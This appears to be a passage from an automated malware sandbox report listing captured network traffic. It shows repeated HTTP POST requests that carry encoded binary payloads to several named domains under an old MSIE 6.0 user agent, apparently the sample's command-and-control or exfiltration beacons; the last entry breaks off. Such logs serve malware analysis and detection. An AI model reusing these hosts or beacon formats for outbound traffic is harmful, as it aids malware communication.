64 63 75 36 73 39 76 44 54 75 7a 70 63 31 42 70 70 79 4d 43 2b 4c 59 2b 37 49 78 64 74 6c 4e 72 5a 44 52 33 39 35 50 54 61 43 79 4d 69 54 56 66 54 77 4f 70 44 49 7a 44 46 79 4e 56 76 66 54 77 59 4c 4c 53 50 69 71 68 74 73 45 70 31 44 4f 51 76 Data Ascii: 85z6G04gW2XE8SKz2auM2LGGJANOuFfnYqWbUAI/Jtc13qUluW5hEBq9svaHUFVl02y//evUqDeKSKvUh2ww4b2Ov3TQ32d7WNWTem1TJ4873WGit282YdMI7e7BlK/xRfRW5iz1LEnEeEjcwz7XclDFQoyAdfq8E0A+cNR+3gpKa1Vuj3BD+52ZRzdZo8c/3+6NpC4FZqEt06M/GLgtH8iybseNN44aAfeWKvOfON9k2/qaNm/ET4PPksckJ1cELzRsHdSWn2atZ7RIMxHXuH5aPMg5sNdRZpyNUnoNilW09yrcIEV9pHGdPuouaIRUtbB3+mm2T7auK++Q14NvmMpOfsGCYcKJj6zL/jb8jThDFD86sCxP+F2tAcNyvLdcBlOc1oJULaHf0Sfb/gXAJ0H2Lk3YHceJp2UuQWE4dImFxFcjRr6wXCVKgWIPsTgMaU1AACzU8Yt1LuYWtCvNs9nIo/uEk9Hdcu6s9vDTuzpc1BppyMC+LY+7IxdtlNrZDR395PTaCyMiTVfTwOpDIzDFyNVvfTwYLLSPiqhtsEp1DOQv
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 51 6b 6d 78 46 6c 6e 30 57 6d 56 30 73 65 4c 2b 61 4e 45 5a 66 50 4a 78 6f 31 4b 33 77 4b 6e 68 6e 61 77 4c 78 58 73 38 30 58 4a 49 49 36 65 5a 58 48 39 4b 75 33 54 37 44 72 53 52 7a 58 55 65 2b 67 4f 6e 4a 6e 70 67 69 53 52 70 45 59 38 4e 68 2f 54 72 31 31 32 35 4f 49 51 4e 4a 41 47 61 74 4a 5a 44 73 34 4f 78 63 74 78 37 56 52 48 72 4c 73 70 55 42 35 56 56 74 37 46 49 68 55 78 72 68 78 58 63 45 30 35 56 2f 2f 36 45 51 58 56 31 52 46 44 39 4c 50 2f 59 74 34 76 57 2b 36 44 49 64 37 46 43 39 71 68 76 6b 38 78 43 50 55 65 52 70 48 44 38 5a 4c 71 2f 67 6a 69 6e 51 55 76 63 56 64 6c 68 59 46 75 52 6d 67 72 44 42 35 55 58 73 34 71 71 78 74 7a 54 2f 44 75 2b 42 2f 46 42 7a 69 5a 42 2f 4f 66 4b 31 6c 43 64 4d 53 39 4e 79 51 50 2f 2b 46 31 43 30 62 73 4d 58 4f 48 50 32 71 30 54 66 2b 74 65 6a 4b 7a 76 7a 59 6c 6b 31 2f 62 41 63 2b 52 46 62 6e 50 7a 70 7a 47 6e 39 6b 64 33 6a 63 78 47 43 4c 46 74 53 78 46 51 37 4c 6a 66 41 30 6f 6a 4c 6f 6b 4a 67 46 5a 77 4d 61 62 51 51 72 79 63 52 31 76 4e 79 72 2b 66 5a 64 59 64 41 55 6f 66 75 74 41 56 48 6b 51 2f 56 73 69 6c 59 55 33 66 75 47 32 38 4a 43 41 65 48 65 77 43 6b 74 75 37 2b 4a 79 45 62 4f 50 64 6e 7a 6a 52 66 65 6e 6b 2f 64 77 34 41 71 75 30 76 4b 48 48 55 56 6b 39 47 6f 6a 65 4b 54 42 63 45 74 66 75 74 68 45 48 42 48 56 45 2b 4c 36 64 71 35 30 53 56 2f 6c 57 59 30 50 36 79 6b 6d 65 6f 4b 79 7a 6e 72 57 76 59 76 63 65 66 32 70 4e 67 47 51 73 6f 50 30 67 59 6c 33 4c 31 2b 70 4e 38 38 2b 43 4f 43 4c 4c 7a 6a 35 43 79 53 74 65 48 38 66 38 45 32 43 69 44 4d 2b 2f 66 49 6e 78 4a 4c 78 4f 30 59 75 53 50 54 53 35 54 32 44 6b 67 6b 42 77 47 6d 48 77 79 36 63 5a 65 61 4e 4c 58 4c 67 74 62 56 4c 2f 45 4b 37 6f 31 53 36 73 53 47 68 72 43 51 42 67 56 43 2b 39 66 45 4f 2b 4c 66 7a 50 53 67 3d 3d Data Ascii: QkmxFln0WmV0seL+aNEZfPJxo1K3wKnhnawLxXs80XJII6eZXH9Ku3T7DrSRzXUe+gOnJnpgiSRpEY8Nh/Tr1125OIQNJAGatJZDs4Oxctx7VRHrLspUB5VVt7FIhUxrhxXcE05V//6EQXV1RFD9LP/Yt4vW+6DId7FC9qhvk8xCPUeRpHD8ZLq/gjinQUvcVdlhYFuRmgrDB5UXs4qqxtzT/Du+B/FBziZB/OfK1lCdMS9NyQP/+F1C0bsMXOHP2q0Tf+tejKzvzYlk1/bAc+RFbnPzpzGn9kd3jcxGCLFtSxFQ7LjfA0ojLokJgFZwMabQQrycR1vNyr+fZdYdAUofutAVHkQ/VsilYU3fuG28JCAeHewCktu7+JyEbOPdnzjRfenk/dw4Aqu0vKHHUVk9GojeKTBcEtfuthEHBHVE+L6dq50SV/lWY0P6ykmeoKyznrWvYvcef2pNgGQsoP0gYl3L1+pN88+COCLLzj5CySteH8f8E2CiDM+/fInxJLxO0YuSPTS5T2DkgkBwGmHwy6cZeaNLXLgtbVL/EK7o1S6sSGhrCQBgVC+9fEO+LfzPSg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 44 4b 6b 41 36 4d 48 50 53 47 56 6f 38 77 6d 68 6f 47 62 42 72 5a 71 70 51 68 67 2f 42 46 54 4b 68 59 4c 6e 74 33 44 76 48 30 4f 49 4b 6b 2b 65 56 72 59 2f 65 50 55 6b 73 51 46 72 43 66 52 6a 6b 67 36 50 59 2b 45 30 6a 77 59 63 56 4e 63 78 4d 4d 48 75 31 54 43 55 47 68 56 30 33 67 79 58 70 4b 76 74 78 35 77 4d 6b 66 51 57 72 6f 6e 63 51 33 35 59 33 4a 2f 56 65 74 51 33 69 49 34 48 78 4b 51 71 2b 62 64 43 4d 6f 45 61 55 56 52 53 73 68 4a 55 4f 70 51 47 34 6f 57 48 64 53 6f 36 6f 2f 6d 50 76 58 73 4e 4a 33 55 33 36 6d 38 33 59 36 30 77 4f 73 73 4f 45 36 51 4f 73 6e 47 54 4a 73 56 76 4b 6b 4f 44 61 73 42 74 50 75 6b 35 52 6b 51 43 4d 2f 49 68 6c 62 68 65 67 75 50 32 57 39 56 63 50 67 6f 6c 51 52 78 6f 49 2b 72 59 70 4d 31 39 78 62 4b 69 5a 47 49 71 6b 2b 46 78 42 75 55 77 63 54 5a 62 4c 38 62 43 43 67 38 58 71 30 70 34 65 78 79 32 47 62 45 4b 38 61 73 50 39 61 6a 58 6d 47 34 4c 59 62 49 45 56 61 6e 4f 58 73 78 5a 44 79 58 6d 50 6b 75 43 6e 65 45 69 70 78 70 47 47 54 38 49 4b 43 5a 42 7a 65 4b 6b 50 6a 4e 2b 4c 57 47 52 46 77 7a 48 4c 61 34 76 79 76 6a 6d 67 43 39 54 35 4b 6b 55 51 46 6e 51 61 45 6a 42 37 46 51 49 36 6d 51 69 45 55 35 32 53 37 42 33 72 78 36 37 39 77 32 5a 79 47 78 68 59 6f 4e 2b 30 55 62 41 4b 43 4a 7a 4f 7a 47 71 55 6c 7a 78 68 5a 78 75 63 74 4c 6f 55 64 45 4c 6e 55 56 58 7a 34 70 33 75 33 45 6b 52 4c 4e 44 4b 48 4b 70 46 6e 6f 6c 2b 4d 6f 32 36 76 63 78 57 35 70 7a 47 72 6a 52 5a 54 6d 78 70 71 6a 4a 79 45 33 44 73 35 54 50 36 43 72 49 79 38 44 6b 6a 4a 66 4a 4d 42 79 63 63 43 76 71 65 70 77 2b 4a 6f 69 4a 61 39 69 76 55 54 4a 30 41 78 56 34 78 79 71 2f 43 35 39 57 52 6a 70 6d 76 32 63 75 67 41 6a 43 72 4d 64 44 35 4d 6e 49 62 54 73 2b 52 50 31 39 74 56 58 51 2f 4c 43 77 34 47 35 74 44 41 3d 3d Data Ascii: DKkA6MHPSGVo8wmhoGbBrZqpQhg/BFTKhYLnt3DvH0OIKk+eVrY/ePUksQFrCfRjkg6PY+E0jwYcVNcxMMHu1TCUGhV03gyXpKvtx5wMkfQWroncQ35Y3J/VetQ3iI4HxKQq+bdCMoEaUVRSshJUOpQG4oWHdSo6o/mPvXsNJ3U36m83Y60wOssOE6QOsnGTJsVvKkODasBtPuk5RkQCM/IhlbheguP2W9VcPgolQRxoI+rYpM19xbKiZGIqk+FxBuUwcTZbL8bCCg8Xq0p4exy2GbEK8asP9ajXmG4LYbIEVanOXsxZDyXmPkuCneEipxpGGT8IKCZBzeKkPjN+LWGRFwzHLa4vyvjmgC9T5KkUQFnQaEjB7FQI6mQiEU52S7B3rx679w2ZyGxhYoN+0UbAKCJzOzGqUlzxhZxuctLoUdELnUVXz4p3u3EkRLNDKHKpFnol+Mo26vcxW5pzGrjRZTmxpqjJyE3Ds5TP6CrIy8DkjJfJMByccCvqepw+JoiJa9ivUTJ0AxV4xyq/C59WRjpmv2cugAjCrMdD5MnIbTs+RP19tVXQ/LCw4G5tDA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 2f 52 44 30 6e 6a 6b 67 50 6d 58 56 43 53 65 47 79 45 7a 2b 52 74 4c 6f 58 35 77 58 6d 6e 68 54 66 61 59 75 54 74 73 30 65 65 73 43 4c 78 4b 70 73 73 48 32 47 57 50 69 6a 4e 4e 56 74 41 44 76 4c 45 38 5a 62 30 71 6f 68 47 6f 78 58 52 6a 70 30 4a 50 46 36 38 72 61 6b 62 70 6e 75 7a 78 66 67 4d 57 38 51 4f 58 74 2f 42 76 4c 45 38 51 35 47 52 50 66 32 4a 33 48 56 52 64 51 56 78 50 68 41 46 7a 41 4d 6c 2f 45 69 45 76 68 62 4e 6f 42 31 77 61 74 50 79 46 59 6c 53 54 43 54 78 33 48 61 34 58 64 4c 6b 6a 50 4b 2f 42 4f 34 61 55 7a 4a 4a 5a 49 63 72 46 77 59 47 67 4f 61 6d 70 74 31 48 4c 64 78 67 74 63 57 42 36 66 63 33 71 55 41 7a 76 33 70 63 2b 79 48 4f 56 6d 31 30 41 64 63 54 32 6d 50 2b 4d 71 50 7a 57 69 72 66 70 48 75 75 41 49 53 53 2b 33 4d 48 53 7a 6d 4c 7a 4d 45 51 47 57 50 36 34 74 6c 51 70 6e 68 47 46 4b 59 44 35 56 78 4f 6d 37 37 71 48 67 46 4f 59 4c 33 58 75 2f 58 4e 31 47 48 43 4a 45 37 34 37 36 7a 62 78 56 43 67 36 55 6e 65 35 70 77 31 61 76 43 2f 4a 5a 62 32 72 47 65 6e 47 36 4d 58 52 45 34 30 6c 73 6e 77 73 48 30 32 53 71 75 6f 67 48 4a 52 67 35 63 72 66 67 44 36 53 41 39 54 78 55 74 65 63 4a 59 4a 72 63 2b 77 53 2f 74 4a 50 4e 44 75 41 77 37 62 69 6d 78 31 61 4b 5a 38 31 58 5a 57 76 37 6e 64 49 30 46 58 6e 63 6f 65 5a 34 79 56 61 2b 76 61 4c 4e 31 6a 67 72 35 63 43 32 71 39 34 46 2b 77 43 61 74 74 4c 68 64 4a 68 47 6f 45 7a 42 78 45 34 69 6a 7a 6c 4e 5a 31 77 69 68 67 7a 54 65 62 66 47 42 78 76 4d 4b 6b 49 37 70 36 49 32 55 70 59 6b 49 72 6b 36 50 59 65 2b 77 63 56 4a 72 44 59 4e 79 67 67 75 6a 65 78 55 7a 71 45 7a 4a 44 2f 43 4e 71 39 2b 34 50 66 4a 76 79 2f 72 43 79 4b 39 78 31 2b 46 47 32 73 43 30 76 47 64 36 4e 32 5a 45 69 73 46 61 52 71 78 30 41 3d 3d Data Ascii: /RD0njkgPmXVCSeGyEz+RtLoX5wXmnhTfaYuTts0eesCLxKpssH2GWPijNNVtADvLE8Zb0qohGoxXRjp0JPF68rakbpnuzxfgMW8QOXt/BvLE8Q5GRPf2J3HVRdQVxPhAFzAMl/EiEvhbNoB1watPyFYlSTCTx3Ha4XdLkjPK/BO4aUzJJZIcrFwYGgOampt1HLdxgtcWB6fc3qUAzv3pc+yHOVm10AdcT2mP+MqPzWirfpHuuAISS+3MHSzmLzMEQGWP64tlQpnhGFKYD5VxOm77qHgFOYL3Xu/XN1GHCJE7476zbxVCg6Une5pw1avC/JZb2rGenG6MXRE40lsnwsH02SquogHJRg5crfgD6SA9TxUtecJYJrc+wS/tJPNDuAw7bimx1aKZ81XZWv7ndI0FXncoeZ4yVa+vaLN1jgr5cC2q94F+wCattLhdJhGoEzBxE4ijzlNZ1wihgzTebfGBxvMKkI7p6I2UpYkIrk6PYe+wcVJrDYNyggujexUzqEzJD/CNq9+4PfJvy/rCyK9x1+FG2sC0vGd6N2ZEisFaRqx0A==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cokocoko.comCache-Control: no-cacheData Raw: 32 35 72 5a 65 6b 35 45 52 57 55 61 71 6c 53 32 32 58 2f 49 70 62 46 4b 70 76 6c 4f 72 41 5a 45 59 73 47 31 6a 71 32 77 65 78 78 32 6f 35 4d 66 73 56 67 44 42 68 61 59 4a 2b 4d 66 64 5a 6b 2b 64 41 2f 4d 64 73 55 52 35 4a 62 4e 59 6a 62 65 65 79 79 50 35 58 39 6b 58 36 33 49 72 7a 73 66 67 67 7a 31 74 37 59 64 48 34 76 65 30 6c 4f 68 48 6d 52 4f 47 45 49 43 6c 77 47 76 73 32 6a 6e 71 62 79 4f 75 32 75 4f 64 51 66 54 2b 59 77 6d 47 6f 38 35 6e 2f 54 57 50 4a 4e 54 34 6c 50 39 52 42 6e 66 6e 4c 64 54 4c 69 78 4f 53 51 33 41 6c 33 44 4c 42 37 35 64 2b 62 70 49 53 64 42 52 72 73 71 68 62 58 4b 4f 42 6a 75 32 4e 53 69 70 4d 49 48 6b 75 6a 47 65 6b 2f 48 47 6d 4b 77 44 71 36 66 51 48 31 78 62 61 4e 4d 32 6c 4b 6c 70 70 69 48 56 62 56 79 47 43 6f 71 62 61 4f 49 2f 37 35 68 61 30 67 64 39 54 57 53 5a 6f 46 42 6f 61 32 69 63 72 51 7a 6e 42 4b 68 48 65 41 73 34 76 78 54 2f 33 56 48 58 6c 2b 2b 73 69 43 59 37 61 6d 7a 4b 42 55 41 57 4f 69 67 35 38 61 61 65 57 46 6a 38 67 42 44 4f 68 33 4e 76 35 74 70 4b 2f 76 58 43 74 56 51 54 6f 51 32 41 32 6e 36 59 46 35 62 4e 4a 31 2f 48 68 5a 73 37 73 48 47 71 39 59 6b 31 56 54 2b 37 6e 57 57 35 7a 33 63 74 74 4a 56 76 39 65 54 61 2b 78 72 4d 66 54 64 75 57 61 45 2f 56 32 6c 6c 6b 7a 42 2b 45 68 68 76 6d 66 62 65 31 4c 77 77 6b 54 49 45 61 34 4f 48 49 6d 2f 4d 62 4a 65 56 49 37 55 50 37 4c 49 50 65 52 76 44 70 45 78 31 78 4e 51 4f 7a 67 4f 58 38 48 71 78 51 56 62 6e 38 76 55 6f 6b 55 4b 49 37 6c 7a 54 66 79 4e 36 77 66 78 53 75 65 65 68 39 44 57 4c 64 64 79 4c 55 49 35 78 2b 53 46 54 50 38 30 4a 59 2f 30 48 4f 43 77 78 6f 53 77 64 71 41 2f 70 44 62 4d 61 76 71 36 4d 44 6b 70 6a 6e 4b 73 77 62 33 72 77 34 76 4c 34 37 6e 76 64 69 75 65 5a 43 79 71 44 77 65 52 49 37 78 37 41 42 79 43 49 76 6b 30 32 6f 2b 38 3d Data Ascii: 25rZek5ERWUaqlS22X/IpbFKpvlOrAZEYsG1jq2wexx2o5MfsVgDBhaYJ+MfdZk+dA/MdsUR5JbNYjbeeyyP5X9kX63Irzsfggz1t7YdH4ve0lOhHmROGEIClwGvs2jnqbyOu2uOdQfT+YwmGo85n/TWPJNT4lP9RBnfnLdTLixOSQ3Al3DLB75d+bpISdBRrsqhbXKOBju2NSipMIHkujGek/HGmKwDq6fQH1xbaNM2lKlppiHVbVyGCoqbaOI/75ha0gd9TWSZoFBoa2icrQznBKhHeAs4vxT/3VHXl++siCY7amzKBUAWOig58aaeWFj8gBDOh3Nv5tpK/vXCtVQToQ2A2n6YF5bNJ1/HhZs7sHGq9Yk1VT+7nWW5z3cttJVv9eTa+xrMfTduWaE/V2llkzB+Ehhvmfbe1LwwkTIEa4OHIm/MbJeVI7UP7LIPeRvDpEx1xNQOzgOX8HqxQVbn8vUokUKI7lzTfyN6wfxSueeh9DWLddyLUI5x+SFTP80JY/0HOCwxoSwdqA/pDbMavq6MDkpjnKswb3rw4vL47nvdiueZCyqDweRI7x7AByCIvk02o+8=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 52 2b 45 78 6b 56 42 4f 54 6d 56 6d 38 6a 41 69 34 38 31 73 4f 67 4f 65 70 70 31 34 77 7a 2f 63 68 48 72 4e 69 4d 53 73 69 55 32 35 59 41 32 41 55 42 35 72 46 59 35 6b 70 69 78 73 35 59 4f 42 50 79 51 65 2b 6e 47 79 6b 56 73 66 62 71 78 6e 33 57 6b 52 70 61 58 36 52 35 32 73 75 38 55 51 5a 33 49 78 63 70 5a 47 58 65 46 5a 33 50 39 67 35 52 7a 2b 31 6a 39 4e 6e 59 41 39 6d 61 48 2b 51 7a 38 76 38 2f 34 64 65 6c 58 45 73 2b 35 49 32 75 74 51 31 63 48 6c 74 71 41 74 30 72 31 79 44 46 65 6a 59 6d 73 35 74 64 64 5a 59 30 77 68 33 56 72 59 76 49 34 46 65 76 79 6a 61 58 79 44 4f 77 64 72 76 59 62 73 4b 5a 52 37 71 6d 45 4b 77 6d 4f 6b 57 6b 31 4e 4a 4e 4a 4c 6f 4e 6b 7a 73 54 67 4a 62 43 55 69 42 44 66 36 32 65 51 6c 62 69 41 6c 6c 76 65 75 6b 36 67 43 6d 4c 50 71 41 77 55 4c 41 45 47 6a 42 79 71 4b 47 67 52 71 77 73 4c 6b 62 30 41 35 75 4b 6a 67 76 36 6b 63 34 67 65 6c 7a 65 56 2f 56 30 35 57 76 54 46 70 33 64 6a 72 4f 49 42 55 43 6a 63 4d 56 4f 49 55 62 68 4f 2f 67 4c 54 57 63 47 4b 4d 55 63 53 63 6f 53 50 4c 4c 64 47 72 49 4e 33 36 72 38 76 55 62 4f 61 48 4a 50 62 33 43 77 63 36 59 4a 34 59 6a 32 48 45 63 77 37 50 4a 79 47 45 46 6a 69 69 35 62 4e 33 71 72 75 55 31 57 58 46 61 70 43 59 63 73 51 53 58 78 4d 6f 73 52 35 45 54 41 56 78 49 39 36 7a 4e 6e 50 61 76 33 42 78 56 52 2f 51 65 2f 53 48 55 49 2f 2f 36 5a 57 59 64 41 4a 4c 48 5a 32 73 44 32 6e 54 43 38 6f 54 45 41 67 56 59 56 66 69 6a 53 54 45 4c 77 38 51 78 4e 6d 34 59 49 76 6b 68 53 75 33 61 61 43 35 76 71 45 48 4a 32 76 47 6d 44 63 65 30 2b 74 72 53 69 34 32 31 56 4c 75 49 49 38 49 44 42 49 42 4b 6a 67 50 71 38 49 6f 45 52 44 44 70 61 70 31 79 4c 43 44 44 38 33 43 48 5a 4d 57 71 73 77 3d Data Ascii: R+ExkVBOTmVm8jAi481sOgOepp14wz/chHrNiMSsiU25YA2AUB5rFY5kpixs5YOBPyQe+nGykVsfbqxn3WkRpaX6R52su8UQZ3IxcpZGXeFZ3P9g5Rz+1j9NnYA9maH+Qz8v8/4delXEs+5I2utQ1cHltqAt0r1yDFejYms5tddZY0wh3VrYvI4FevyjaXyDOwdrvYbsKZR7qmEKwmOkWk1NJNJLoNkzsTgJbCUiBDf62eQlbiAllveuk6gCmLPqAwULAEGjByqKGgRqwsLkb0A5uKjgv6kc4gelzeV/V05WvTFp3djrOIBUCjcMVOIUbhO/gLTWcGKMUcScoSPLLdGrIN36r8vUbOaHJPb3Cwc6YJ4Yj2HEcw7PJyGEFjii5bN3qruU1WXFapCYcsQSXxMosR5ETAVxI96zNnPav3BxVR/Qe/SHUI//6ZWYdAJLHZ2sD2nTC8oTEAgVYVfijSTELw8QxNm4YIvkhSu3aaC5vqEHJ2vGmDce0+trSi421VLuII8IDBIBKjgPq8IoERDDpap1yLCDD83CHZMWqsw=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 51 6b 6d 78 46 6c 6e 30 57 6d 56 30 73 65 4c 2b 61 4e 45 5a 66 50 4a 78 6f 31 4b 33 77 4b 6e 68 6e 61 77 4c 78 58 73 38 30 58 4a 49 49 36 65 5a 58 48 39 4b 75 33 54 37 44 72 53 52 7a 58 55 65 2b 67 4f 6e 4a 6e 70 67 69 53 52 70 45 59 38 4e 68 2f 54 72 31 31 32 35 4f 49 51 4e 4a 41 47 61 74 4a 5a 44 73 34 4f 78 63 74 78 37 56 52 48 72 4c 73 70 55 42 35 56 56 74 37 46 49 68 55 78 72 68 78 58 63 45 30 35 56 2f 2f 36 45 51 58 56 31 52 46 44 39 4c 50 2f 59 74 34 76 57 2b 36 44 49 64 37 46 43 39 71 68 76 6b 38 78 43 50 55 65 52 70 48 44 38 5a 4c 71 2f 67 6a 69 6e 51 55 76 63 56 64 6c 68 59 46 75 52 6d 67 72 44 42 35 55 58 73 34 71 71 78 74 7a 54 2f 44 75 2b 42 2f 46 42 7a 69 5a 42 2f 4f 66 4b 31 6c 43 64 4d 53 39 4e 79 51 50 2f 2b 46 31 43 30 62 73 4d 58 4f 48 50 32 71 30 54 66 2b 74 65 6a 4b 7a 76 7a 59 6c 6b 31 2f 62 41 63 2b 52 46 62 6e 50 7a 70 7a 47 6e 39 6b 64 33 6a 63 78 47 43 4c 46 74 53 78 46 51 37 4c 6a 66 41 30 6f 6a 4c 6f 6b 4a 67 46 5a 77 4d 61 62 51 51 72 79 63 52 31 76 4e 79 72 2b 66 5a 64 59 64 41 55 6f 66 75 74 41 56 48 6b 51 2f 56 73 69 6c 59 55 33 66 75 47 32 38 4a 43 41 65 48 65 77 43 6b 74 75 37 2b 4a 79 45 62 4f 50 64 6e 7a 6a 52 66 65 6e 6b 2f 64 77 34 41 71 75 30 76 4b 48 48 55 56 6b 39 47 6f 6a 65 4b 54 42 63 45 74 66 75 74 68 45 48 42 48 56 45 2b 4c 36 64 71 35 30 53 56 2f 6c 57 59 30 50 36 79 6b 6d 65 6f 4b 79 7a 6e 72 57 76 59 76 63 65 66 32 70 4e 67 47 51 73 6f 50 30 67 59 6c 33 4c 31 2b 70 4e 38 38 2b 43 4f 43 4c 4c 7a 6a 35 43 79 53 74 65 48 38 66 38 45 32 43 69 44 4d 2b 2f 66 49 6e 78 4a 4c 78 4f 30 59 75 53 50 54 53 35 54 32 44 6b 67 6b 42 77 47 6d 48 77 79 36 63 5a 65 61 4e 4c 58 4c 67 74 62 56 4c 2f 45 4b 37 6f 31 53 36 73 53 47 68 72 43 51 42 67 56 43 2b 39 66 45 4f 2b 4c 66 7a 50 53 67 3d 3d Data Ascii: QkmxFln0WmV0seL+aNEZfPJxo1K3wKnhnawLxXs80XJII6eZXH9Ku3T7DrSRzXUe+gOnJnpgiSRpEY8Nh/Tr1125OIQNJAGatJZDs4Oxctx7VRHrLspUB5VVt7FIhUxrhxXcE05V//6EQXV1RFD9LP/Yt4vW+6DId7FC9qhvk8xCPUeRpHD8ZLq/gjinQUvcVdlhYFuRmgrDB5UXs4qqxtzT/Du+B/FBziZB/OfK1lCdMS9NyQP/+F1C0bsMXOHP2q0Tf+tejKzvzYlk1/bAc+RFbnPzpzGn9kd3jcxGCLFtSxFQ7LjfA0ojLokJgFZwMabQQrycR1vNyr+fZdYdAUofutAVHkQ/VsilYU3fuG28JCAeHewCktu7+JyEbOPdnzjRfenk/dw4Aqu0vKHHUVk9GojeKTBcEtfuthEHBHVE+L6dq50SV/lWY0P6ykmeoKyznrWvYvcef2pNgGQsoP0gYl3L1+pN88+COCLLzj5CySteH8f8E2CiDM+/fInxJLxO0YuSPTS5T2DkgkBwGmHwy6cZeaNLXLgtbVL/EK7o1S6sSGhrCQBgVC+9fEO+LfzPSg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.holleman.usCache-Control: no-cacheData Raw: 66 35 41 34 57 61 35 74 5a 57 57 36 4c 56 79 52 75 64 6c 47 67 68 45 62 77 45 6f 75 38 62 77 45 77 74 43 69 6c 4d 54 32 77 74 54 6e 73 30 6f 38 51 36 4b 36 6b 52 4d 36 54 34 5a 31 54 49 4f 37 39 2b 6d 4f 6a 67 59 36 5a 32 73 53 53 69 56 57 56 35 4a 45 55 32 43 55 32 64 6a 6b 59 56 64 50 44 4a 2f 57 62 6e 46 49 7a 2f 41 38 41 32 2f 68 65 77 46 7a 6b 75 68 71 55 4e 76 38 70 65 68 53 65 62 36 50 7a 57 41 44 71 67 56 46 36 47 39 6f 75 32 2f 2f 46 69 54 2b 78 71 67 66 59 42 79 49 57 34 67 72 4f 58 6c 59 6e 61 67 34 49 44 44 66 72 4c 6c 33 4f 73 63 4f 79 53 38 38 4a 56 63 63 6a 31 70 2f 6d 42 72 65 4a 52 6b 2f 52 46 79 73 73 6a 64 59 42 38 51 66 62 65 30 73 73 57 51 2b 52 43 4a 67 45 2b 50 64 46 54 59 6f 45 75 63 68 59 33 73 7a 57 4f 36 37 6a 4a 68 67 5a 56 79 46 73 65 79 70 77 69 55 67 65 57 65 33 6a 78 44 75 48 57 6a 70 30 44 70 71 61 35 64 52 34 32 41 41 78 53 61 34 70 38 56 62 4e 54 53 69 4b 4e 45 45 48 35 68 34 57 6c 52 50 4f 46 4d 53 6f 4f 50 49 4f 62 4b 6d 53 33 62 4c 6e 52 36 36 45 37 49 73 6f 4a 42 75 44 39 36 70 69 4e 7a 6f 71 49 5a 67 6b 6f 4f 56 44 62 68 4d 31 7a 4e 6c 56 68 30 55 7a 74 71 76 54 57 55 48 4b 68 79 4d 44 5a 62 68 73 53 35 45 75 48 71 65 6d 56 76 4b 5a 6a 39 37 72 39 36 6b 36 4a 69 33 65 33 4a 45 68 35 38 72 4f 54 38 35 4d 30 71 56 41 54 70 31 39 35 79 35 72 72 35 31 78 78 33 57 32 6c 67 65 74 55 50 4b 43 66 6b 36 43 61 6e 4c 6c 71 78 71 72 35 7a 59 75 53 7a 4c 77 52 64 32 31 55 2b 6a 79 54 4d 43 78 5a 6e 56 44 59 6d 4e 2f 6b 48 4a 77 5a 50 56 6d 50 36 5a 4a 50 42 61 5a 58 53 31 4f 55 6b 4a 64 45 70 51 6b 63 6c 63 47 2b 62 75 4d 56 4b 6e 44 50 48 4c 5a 63 7a 67 4d 51 75 68 Data Ascii: f5A4Wa5tZWW6LVyRudlGghEbwEou8bwEwtCilMT2wtTns0o8Q6K6kRM6T4Z1TIO79+mOjgY6Z2sSSiVWV5JEU2CU2djkYVdPDJ/WbnFIz/A8A2/hewFzkuhqUNv8pehSeb6PzWADqgVF6G9ou2//FiT+xqgfYByIW4grOXlYnag4IDDfrLl3OscOyS88JVccj1p/mBreJRk/RFyssjdYB8Qfbe0ssWQ+RCJgE+PdFTYoEuchY3szWO67jJhgZVyFseypwiUgeWe3jxDuHWjp0Dpqa5dR42AAxSa4p8VbNTSiKNEEH5h4WlRPOFMSoOPIObKmS3bLnR66E7IsoJBuD96piNzoqIZgkoOVDbhM1zNlVh0UztqvTWUHKhyMDZbhsS5EuHqemVvKZj97r96k6Ji3e3JEh58rOT85M0qVATp195y5rr51xx3W2lgetUPKCfk6CanLlqxqr5zYuSzLwRd21U+jyTMCxZnVDYmN/kHJwZPVmP6ZJPBaZXS1OUkJdEpQkclcG+buMVKnDPHLZczgMQuh
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yocinc.orgCache-Control: no-cacheData Raw: 50 33 67 68 57 65 35 73 5a 57 55 66 46 78 45 4f 2b 55 38 36 62 31 47 59 65 75 42 75 77 66 53 4e 41 6d 77 30 65 55 70 71 46 36 50 77 35 4e 76 4b 74 34 61 47 38 2b 4b 53 52 32 5a 6f 6e 5a 4b 2b 77 39 5a 59 2f 49 42 6a 73 2f 4c 63 46 37 56 4d 76 30 69 67 48 56 2f 57 77 53 74 47 30 45 32 2b 6c 2f 76 56 53 57 42 36 7a 35 6c 68 44 55 79 71 41 2b 2f 6e 34 69 50 31 74 49 41 31 70 38 68 46 44 4c 55 52 72 34 4d 41 4a 79 56 47 65 65 6e 76 